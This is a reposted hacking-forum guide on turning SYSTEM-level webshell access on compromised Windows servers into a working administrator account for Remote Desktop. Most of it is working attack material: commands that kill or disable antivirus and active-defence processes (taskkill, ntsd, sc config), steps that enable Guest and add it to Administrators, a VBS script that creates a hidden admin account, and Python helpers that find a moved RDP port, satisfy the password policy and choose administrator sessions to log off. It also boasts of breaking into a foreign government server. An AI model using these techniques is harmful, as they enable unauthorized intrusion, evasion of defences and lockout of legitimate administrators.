Windows Server: webshell with SYSTEM privileges but unable to add an account for 3389, a summary of breakout methods

Source: Internet
Author: User



Transferred from: http://bbs.blackbap.org/thread-2331-1-1.html


Quite a few Silic friends have a webshell running with SYSTEM privileges on Windows, try to add an account, and it fails. SYSTEM privileges are more than enough, so why does it not succeed?
There are many reasons. I have summed up the common causes, analysed them in the article below, and attached a few of my own bypass methods. Privilege escalation can never be a hundred percent successful; this is only a summary of common situations, and I will add the rest over time.
Yoco Smart
From: Silic Group Hacker Army
http://blackbap.org
The webshell has SYSTEM privileges, but a user cannot be added to the Administrators group, so a 3389 (Remote Desktop) connection cannot be made. The causes are summarised as follows:
I. Antivirus software
1. Antivirus and protection software in general
2. McAfee antivirus
3. Kaspersky antivirus
4. Kingsoft protection software
5. Disabling the protection service
6. Other protection software
II. Policy
1. The 3389 port has been changed
2. Account inexplicably cannot be added
3. Administrator restrictions
4. The system has reached the maximum number of connections

-----------------------I. Antivirus software-----------------------------
1. Antivirus and protection software in general
Antivirus and protection software is often encountered on some domestic servers. If you use the webshell to add an account to Administrators, it blocks the action and alerts the administrator, so the addition fails.
So how do you break this restriction? No protection product for a server system is perfect; in fact it is very simple.
What blocks the webshell from adding accounts is mainly the active-defense (HIPS) component. End the active defense, and the antivirus scanner on its own is just a decoration.
That day I happened to search Baidu for the keyword blackbap.org and, surprisingly, it turned up on an antivirus vendor's forum: the PHP webshell ("big horse") developed by Silic had been reported there by a server administrator.
Basically the admin posted the webshell and said it was not being detected, and asked them to update the virus database. An engineer looked at it and said it would be detected after an update; the admin said he had updated and it still was not detected. The engineer told him to install something else; the admin said he had installed it and it still was not detected, and the engineer went quiet like a turtle pulling its head in. You can see how useless it is on a server. To put it plainly: spend the money you use on lawsuits on product development instead.
All right, enough of that; here is the breakthrough method.
First run tasklist to look at the list of processes, then

    taskkill /im <process name>.exe /f

to end the active-defense process.
The relevant processes are as follows:
Once these are gone the obstacle is basically cleared: add the account, and run pr if you still need to escalate.
Because of how Apache+PHP is usually installed on Windows (Apache running as a service under LocalSystem), many PHP-site webshells already have SYSTEM privileges, so ending the process is a breeze.
Even without SYSTEM there are ways. ASPX (ASP.NET), for example, has functions for manipulating processes. Look at this code (pulled straight from a webshell):


    using System;
    using System.Diagnostics;
    using System.Web.UI;

    // Button handler: kill every process whose name matches the entry selected in ListBox1
    protected void Kp_Click(object sender, EventArgs e)
    {
        Process[] kp = Process.GetProcesses();
        foreach (Process kp1 in kp)
            if (kp1.ProcessName == ListBox1.SelectedValue.ToString())
            {
                try
                {
                    kp1.Kill();
                    Response.Write("<script>alert('killed');location.href='?';</script>");
                    ListBox1.Items.Clear();
                }
                catch (Exception x)
                {
                    // Kill() throws Win32Exception when the worker identity lacks terminate rights
                    Response.Write(x.Message.ToString());
                    Response.End();
                }
            }
    }


This Kill() call of ASP.NET under IIS can terminate processes easily, even when the worker process only belongs to the Users group (it still needs terminate rights over the target; a process the worker identity cannot open cannot be killed this way).

2. McAfee antivirus
I previously wrote about bypassing McAfee antivirus to get 3389 logon rights.
The original article is here: http://bbs.blackbap.org/thread-2085-1-1.html
The complete process is: enable the Guest account, change Guest's password, and add Guest to the Administrators group.
In testing, McAfee's protection can be bypassed this way; the cmd commands are as follows (the password is quoted because & is a command separator in cmd and would otherwise cut the line in two):

    rem enable the Guest user
    net user Guest /active:yes
    rem change the Guest password
    net user Guest "silic!&11133"
    rem add Guest to the Administrators group
    net localgroup Administrators Guest /add

The second or third of these commands sometimes does not print that the command completed successfully, but in practice it executes fine if you have SYSTEM privileges; the echo is not important.

3. Kaspersky antivirus
Kaspersky's protection is also a headache. There are many ways to break it.
Adjusting the system clock so that Kaspersky's licence key expires is one; I will not go into it. Another is using mkdir to create a folder whose name contains illegal characters such as a trailing ".", and putting the privilege-escalation program (pr and the like) in there.
With Kaspersky's defenses up, the system will not let you add a user directly, but you can try ending the process and adding the account in a single command line: taskkill ... & net user ... /add.
I have not yet tried this method in practice, but it should work in theory, because unlike McAfee, Kaspersky can be terminated directly; it just restarts the process immediately, which is why the two commands are chained so the account is added in the gap.

4. Kingsoft protection software
First, KSafeSvc.exe. At the time I did not know what it was; judging from the file name it is a Kingsoft component.
This process cannot even be ended with taskkill. As long as it is running, net user /add pops up a block/allow prompt, even if net.exe has been renamed (maybe the admin notices, maybe not, but either way it has to be killed before the account can be added).
But there is a command called ntsd that can terminate most processes, even winlogon.exe and svchost.exe:

    ntsd -c q -p <PID>

ends KSafeSvc.exe (ntsd attaches to the PID, runs the debugger command q, and quitting the debugger kills the debuggee; ntsd.exe ships with XP/2003 but is not included in Vista/2008 and later, where it only comes with the Debugging Tools).
Next: the Kingsoft Antivirus + Kingsoft Guardian + Rising Firewall combination.
This combination looks very good but is actually silly. Today I ran into a PHP site with SYSTEM privileges running the Kingsoft Antivirus + Kingsoft Guardian + Rising Firewall combination.
Save the following code to C:\windows\temp\a.vbs; it creates the account through the ADSI WinNT provider instead of net.exe, so the hook on net.exe is never triggered:

    Set wsnetwork = CreateObject("WScript.Network")
    os = "WinNT://" & wsnetwork.ComputerName
    ' bind to the local SAM and the Administrators group through the ADSI WinNT provider
    Set ob = GetObject(os)
    Set oe = GetObject(os & "/Administrators,group")
    ' create the user and set its password
    Set od = ob.Create("User", "Silic")
    od.SetPassword "Silic"
    od.SetInfo
    ' bind to the new user and add it to the Administrators group
    Set of = GetObject(os & "/Silic,user")
    oe.Add os & "/Silic,user"

Then run it with the following command and you get an Administrator account named Silic with the password Silic:

    cscript C:\windows\temp\a.vbs


5. Disabling the protection service

    sc config <service name> start= disabled

Sometimes, when escalating through MySQL or MSSQL, there is antivirus that cannot be terminated, and the escalation fails.
In that case set the antivirus service's start type to disabled and restart the server; the protection service will not run after the reboot and the way is clear. For example (the space after start= is required by sc):

    sc config msmpsvc start= disabled

6. Other protection software
I have seen a lot of less common protection software: some "security shield", Safe3 anti-tamper, and various similar programs whose names I have forgotten.
The way past them is roughly the same as for the mainstream products: end the process, or skip adding an account altogether and enable the existing Guest account to slip past the monitoring; I will not repeat it.
Another way is to change the protection software's service from automatic start to disabled and then restart the server. This works on most servers.

--------------------------------II. Policy-----------------------------
1. The 3389 port has been changed
Before you add an account for 3389, first confirm that 3389 is actually open.
So far I have only seen cases where the 3389 port was changed, never one where Remote Desktop was not enabled at all. So why can some admins' 3389 not be reached?
The reason is simple: the 3389 port was changed. Finding it is easy: netstat -an shows all open ports.
Pick out the suspicious port, then netstat -ano shows the port together with the PID of the process using it, and tasklist shows which svchost.exe has that PID.
Note that it is one of the svchost.exe processes (tasklist /svc lists the services hosted by each one; the RDP listener is the svchost hosting TermService). The configured port can also be read directly from the registry value PortNumber under HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp.
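As an added example (not part of the original post), the lookup above can be done in one pass by combining netstat -ano with tasklist /svc: the RDP listener is whichever svchost.exe hosts TermService, so there is no need to guess which port "looks suspicious". The Python below parses constructed sample output of both commands (in the sample the port has been moved to 33891) and returns the PID and its listening ports; paste in the real output of the two commands from the target to get the real port.

```python
import re

# Constructed sample output in the format the two commands print on an
# English Windows Server; the RDP listener has been moved from 3389 to 33891.
NETSTAT_ANO = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1724
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       836
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:33891          0.0.0.0:0              LISTENING       1104
  TCP    10.0.0.5:33891         10.0.0.9:51522         ESTABLISHED     1104
  TCP    [::]:33891             [::]:0                 LISTENING       1104
  UDP    0.0.0.0:500            *:*                                    1020
"""

TASKLIST_SVC = """
Image Name                     PID Services
========================= ======== ============================================
System                           4 N/A
svchost.exe                    836 RpcEptMapper, RpcSs
svchost.exe                   1020 IKEEXT, PolicyAgent
svchost.exe                   1104 TermService, UmRdpService
httpd.exe                     1724 Apache2.2
"""

# One tasklist /svc row: image name, numeric PID, comma-separated services (or N/A).
# The header and the ===== separator do not match because their PID column is not numeric.
TASKLIST_ROW = re.compile(r"^(\S+)\s+(\d+)\s+(.+?)\s*$")


def services_by_pid(tasklist_svc_output):
    """Map PID -> set of service names from 'tasklist /svc' output.

    Long service lists wrap onto indented continuation lines that carry no
    image name or PID; those are appended to the PID of the preceding row.
    """
    result = {}
    current = None
    for line in tasklist_svc_output.splitlines():
        m = TASKLIST_ROW.match(line)
        if m:
            current = int(m.group(2))
            result.setdefault(current, set())
            if m.group(3) != "N/A":
                result[current].update(s.strip() for s in m.group(3).split(","))
        elif current is not None and line.startswith(" ") and line.strip():
            result[current].update(s.strip() for s in line.split(",") if s.strip())
    return result


def listening_ports_by_pid(netstat_output, proto="TCP"):
    """Map PID -> sorted list of local ports in LISTENING state from 'netstat -ano'."""
    ports = {}
    for line in netstat_output.splitlines():
        parts = line.split()
        # Listening TCP rows have exactly five columns; UDP rows have no State column.
        if len(parts) != 5 or parts[0] != proto or parts[3] != "LISTENING":
            continue
        local, pid = parts[1], int(parts[4])
        port = int(local.rsplit(":", 1)[1])  # handles both 0.0.0.0:p and [::]:p
        ports.setdefault(pid, set()).add(port)
    return {pid: sorted(p) for pid, p in ports.items()}


def find_rdp_ports(netstat_output, tasklist_svc_output, service="TermService"):
    """Return (pid, [ports]) for the svchost hosting TermService, or (None, [])
    when the service is not running at all (Remote Desktop not enabled)."""
    for pid, services in services_by_pid(tasklist_svc_output).items():
        if service in services:
            return pid, listening_ports_by_pid(netstat_output).get(pid, [])
    return None, []


if __name__ == "__main__":
    pid, ports = find_rdp_ports(NETSTAT_ANO, TASKLIST_SVC)
    print("TermService runs in PID %s, listening on %s" % (pid, ports))
```

If find_rdp_ports returns a PID but an empty port list, TermService is running but not listening on TCP, which is worth knowing before you spend time adding an account.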

2. Account inexplicably cannot be added
What does "inexplicable" mean? On some hosts the webshell has SYSTEM privileges, tasklist shows no protection process, the administrator is not online, and still the account cannot be added. What then?
There is always a cause. In most such cases the system has a Group Policy restriction, usually a minimum password length. This policy is often set by McAfee or other protection software, or the system was installed from a ghost image that already carried the setting.
The fix needs no explanation: use a longer password. If the original password was 123456, use something longer that mixes letters, digits and symbols (net accounts shows the current minimum password length).
If it still cannot be added, try adding it with the VBS script instead.
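As an added example (not from the original post), here is a check for exactly this failure mode: a candidate password is tested against the minimum length that net accounts reports, and against the standard Windows complexity rule (at least three of the four character classes, and the password must not contain the account name). net accounts does not display whether complexity is enforced, so the check assumes it is on; a password that passes satisfies either setting. The net accounts output below is constructed.

```python
import re

# Constructed sample output of 'net accounts' on an English Windows Server.
NET_ACCOUNTS = """
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          42
Minimum password length:                              8
Length of password history maintained:                None
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        SERVER
The command completed successfully.
"""


def minimum_password_length(net_accounts_output):
    """Minimum password length from 'net accounts' output (0 if the line is absent)."""
    m = re.search(r"Minimum password length:\s*(\d+)", net_accounts_output)
    return int(m.group(1)) if m else 0


def meets_complexity(password, account_name):
    """Windows 'Password must meet complexity requirements':
    at least three of the four character classes (upper, lower, digit, other),
    and the password must not contain the account name (when the name is at
    least 3 characters), compared case-insensitively. net accounts does not
    show this setting, so it is assumed to be enabled."""
    classes = (
        any(c.isupper() for c in password),
        any(c.islower() for c in password),
        any(c.isdigit() for c in password),
        any(not c.isalnum() for c in password),
    )
    if sum(classes) < 3:
        return False
    if len(account_name) >= 3 and account_name.lower() in password.lower():
        return False
    return True


def password_problems(password, account_name, net_accounts_output):
    """Reasons why 'net user <name> <password> /add' would be rejected (empty if none)."""
    problems = []
    min_len = minimum_password_length(net_accounts_output)
    if len(password) < min_len:
        problems.append("shorter than the minimum length %d" % min_len)
    if not meets_complexity(password, account_name):
        problems.append("fails complexity (3 of 4 character classes, must not contain the account name)")
    return problems


if __name__ == "__main__":
    for candidate in ("123456", "Silic!2011", "Bb0!xQ9rTz"):
        print(candidate, password_problems(candidate, "silic", NET_ACCOUNTS) or "ok")
```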

3. Administrator restrictions
Some perverse administrators go as far as deleting or renaming net.exe in c:\windows\system32, so when you run net directly you get "access denied", "not recognized as an internal or external command" or a similar message.
The administrator thinks this is very clever, but it is not: if the system's net.exe is gone, upload your own net.exe and you are through.
Of course, there are cases where the system is 64-bit and your program is incompatible with it; if it is 64-bit, upload a 64-bit build. Easy.

4. Maximum connection limit reached
Sometimes the account is added, but the connection reports that the maximum number of connections has been reached. The administrator is not online and you still cannot get on, or the administrator is online and deletes you as soon as you log in. That kind of administrator is nasty.
When you cannot get on, first run query user to view the logged-on accounts and their session IDs. The console is usually ID 0 and the IDs go up from there; IDs above about 8 suggest the server has not been restarted for a long time (this is not reliable).
Then logoff <ID> kicks the administrator's corresponding session off, and you can log in. (Disconnected sessions still count toward the limit, so they are the ones to clear first.)
Of course, do not logoff yourself, and better not to kick anyone during the day. If the administrator is online when he gets kicked, you know what happens. ^^!
In 2011, during the China-Vietnam hacker offensive-and-defensive exchange, someone from our site got onto a Vietnamese gov server, and then... in our site's Chrysanthemum chat room: the administrator deleted his account, he logged off the administrator's account and disabled the administrator... Later the administrator, with everyone in the Chrysanthemum chat room watching, ran half an hour to the server room to pull the network cable... The logoff command is really vicious, especially on servers that are not on the local premises...
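As an added example (not from the original post), the following parses query user output and picks the sessions to log off in the order the text recommends: never your own session (marked with > in the output when run interactively), disconnected sessions first because they still occupy a slot and nobody notices when they go, active sessions last. The query user output below is constructed; the commands it produces are the logoff <ID> calls from the text.

```python
import re
from collections import namedtuple

# Constructed sample output of 'query user'. The '>' marks the session the
# command was run from; a disconnected session has an empty SESSIONNAME.
QUERY_USER = """
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 administrator         rdp-tcp#1           2  Active         12  1/7/2012 9:12 AM
>silic                 rdp-tcp#2           3  Active          .  1/7/2012 10:03 AM
 backupop                                  1  Disc         3:21  1/6/2012 11:40 PM
"""

Session = namedtuple("Session", "current user name id state idle logon")

# One session row: optional '>' marker, user, optional session name, numeric ID,
# state, idle time, and the logon time (which itself contains spaces).
# The header line does not match because its ID column is not numeric.
SESSION_ROW = re.compile(
    r"^(>?)\s*(\S+)\s+(\S*)\s+(\d+)\s+(Active|Disc)\s+(\S+)\s+(.+?)\s*$")


def parse_query_user(output):
    """Parse 'query user' output into Session tuples."""
    sessions = []
    for line in output.splitlines():
        m = SESSION_ROW.match(line)
        if m:
            sessions.append(Session(m.group(1) == ">", m.group(2), m.group(3),
                                    int(m.group(4)), m.group(5), m.group(6), m.group(7)))
    return sessions


def sessions_to_logoff(sessions, keep_users=()):
    """Session IDs to free, in order: disconnected sessions first, then active
    ones. Our own session and any user listed in keep_users are never returned."""
    keep = {u.lower() for u in keep_users}
    candidates = [s for s in sessions if not s.current and s.user.lower() not in keep]
    disc = [s.id for s in candidates if s.state == "Disc"]
    active = [s.id for s in candidates if s.state == "Active"]
    return disc + active


def logoff_commands(output, keep_users=()):
    """The 'logoff <ID>' commands to run, one per session to free."""
    ids = sessions_to_logoff(parse_query_user(output), keep_users)
    return ["logoff %d" % sid for sid in ids]


if __name__ == "__main__":
    for cmd in logoff_commands(QUERY_USER):
        print(cmd)
```

When query user is run from a webshell there is no interactive session of your own, so no row carries the > marker; pass your own account name in keep_users in that case so the picker never returns your session.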

Supplement
Some hosts have SYSTEM privileges and it still does not work; first run query user to check the administrator's status.
Very likely the administrator logged on and left the graphical console open, in which case the system does not carry out the taskkill.
So use logoff to kick the administrator off, and those processes go away on their own.
This applies to Server 2008 and later.



